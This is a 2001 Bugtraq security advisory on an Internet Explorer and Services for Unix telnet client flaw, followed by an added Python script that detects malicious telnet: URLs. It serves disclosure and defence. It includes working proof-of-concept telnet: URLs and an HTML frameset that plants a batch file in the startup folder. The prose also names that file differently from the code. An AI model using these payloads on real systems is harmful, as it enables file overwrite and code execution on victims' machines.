Bugtraq mailing list archives
Internet Explorer and Services for Unix 2.0 Telnet Client
From: Oliver Friedrichs <of () SECURITYFOCUS COM>
Date: Tue, 13 Mar 2001 16:00:54 -0800
SecurityFocus.com
http://www.securityfocus.com

Vulnerability Report For Internet Explorer and Services for Unix 2.0 Telnet Client

Date Published: 13 March 2001
Advisory ID: n/a
Bugtraq ID: 2463
CVE CAN: None currently assigned.
Title: Services for Unix 2.0 Telnet Client File Overwrite Vulnerability
Class: Input Validation Error
Remotely Exploitable: Yes
Locally Exploitable: Yes

Vulnerability Description:
=========================

A vulnerability has been discovered in the interaction between Internet Explorer and the Telnet client installed with Services for Unix 2.0 that allows arbitrary files to be overwritten, or created, containing attacker-specified data.

This vulnerability occurs because Internet Explorer executes the "telnet" command and passes command line parameters, specified in the URL, straight through to the telnet program. The Windows 2000 Telnet client contains a client-side logging option, which logs all telnet session data to a file specified by this option. By specifying the "-f" flag to the telnet command, accompanied by a filename, all session text is logged to this file.

Vulnerable Packages/Systems:
===========================

All versions of Internet Explorer with Services for Unix 2.0 installed are presumed to be vulnerable to this problem.

Solution/Vendor Information/Workaround:
======================================

Microsoft has released an update which solves this problem. The update, and more information, can be obtained at the following locations:

http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp

Updates are available for Internet Explorer 5.01 Service Pack 1 and Internet Explorer 5.5 Service Pack 1.

Vendor notified on:
==================

November 1, 2000

Credits:
=======

This vulnerability was discovered by Oliver Friedrichs <of () securityfocus com>. This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp () securityfocus com.

Technical Description - Exploit/Concept Code:
============================================

This vulnerability can be reproduced by giving Internet Explorer a URL such as the following:

    telnet:-f%20\file.txt%20host

The above example will cause Internet Explorer to invoke the telnet client and cause it to connect to the host "host", logging all output to the file "\file.txt". An attacker can cause arbitrary data to be written to this file by setting up a rogue server, such as netcat, listening on the telnet port and sending the desired data to the client. Arbitrary port numbers can also be specified on the telnet command line, so the server need not listen on port 23.

Furthermore, the invocation of the telnet client can be hidden within existing HTML, automating its execution. This vulnerability can also be exploited via Outlook, which by default will automatically process HTML messages.

    <html>
    <frameset rows="100%,*">
    <frame src=about:blank>
    <frame src=telnet:-f%20\Documents%20and%20Settings\All%20Users\start%20menu\programs\startup\start.bat%20host%208000>
    </frameset>
    </html>

The above example will cause data that is received from port 8000 on the host "host" to be written to the file "boom.bat" in the startup directory for all users. Assuming the logged-in user has the appropriate permissions, this will create a batch file that is executed upon any future user logon. Note that if the username is known to the attacker, this can also be directed towards the logged-in user, who will have permission to create this file.

DISCLAIMER: The contents of this advisory are copyright (c) 2000 SecurityFocus.com and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
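A content-inspection check for this issue, added here as an example and not part of the advisory: it scans HTML (for instance a mail body or a page a gateway proxies) for telnet: URLs that carry command-line switches such as -f, URL-decodes them and reports the log file, host and port, so a mail filter or IDS rule can flag the pattern the advisory describes. The sample HTML is constructed, and the regex and token handling are this example's own assumptions about how the URL body is split.

```python
import re
from urllib.parse import unquote

# Constructed sample HTML modelled on the advisory's frameset example; the
# <a> element is an ordinary telnet: link that must not be flagged.
SAMPLE_HTML = """<html><frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\\file.txt%20host%208000>
</frameset>
<a href="telnet://host.example:23">ordinary link</a></html>"""

# A telnet: URL body runs until whitespace, a quote or an angle bracket.
TELNET_URL = re.compile(r'''telnet:(?://)?([^\s"'<>]+)''', re.IGNORECASE)

def find_telnet_urls(html):
    """Return the raw (still percent-encoded) bodies of all telnet: URLs."""
    return [m.group(1) for m in TELNET_URL.finditer(html)]

def parse_telnet_args(decoded):
    """Split a decoded telnet: body into switches and positional tokens;
    '-f' consumes the next token as its log-file name (as in the advisory)."""
    tokens, switches, positional, i = decoded.split(), [], [], 0
    while i < len(tokens):
        tok = tokens[i]
        if not tok.startswith('-'):
            positional.append(tok)
        elif tok.lower() == '-f' and i + 1 < len(tokens):
            switches.append((tok, tokens[i + 1]))
            i += 1
        else:
            switches.append((tok, None))
        i += 1
    return switches, positional

def suspicious_telnet_urls(html):
    """Flag telnet: URLs that smuggle command-line switches in the URL.
    Each hit records the decoded URL, the -f log file, the host and the port."""
    hits = []
    for body in find_telnet_urls(html):
        decoded = unquote(body)
        switches, positional = parse_telnet_args(decoded)
        if not switches:
            continue
        logfile = next((arg for sw, arg in switches if sw.lower() == '-f'), None)
        hits.append({"url": decoded, "logfile": logfile,
                     "host": positional[0] if positional else None,
                     "port": positional[1] if len(positional) > 1 else None})
    return hits
```

Running suspicious_telnet_urls(SAMPLE_HTML) returns one hit with logfile "\file.txt", host "host" and port "8000"; the plain telnet://host.example:23 link produces no hit.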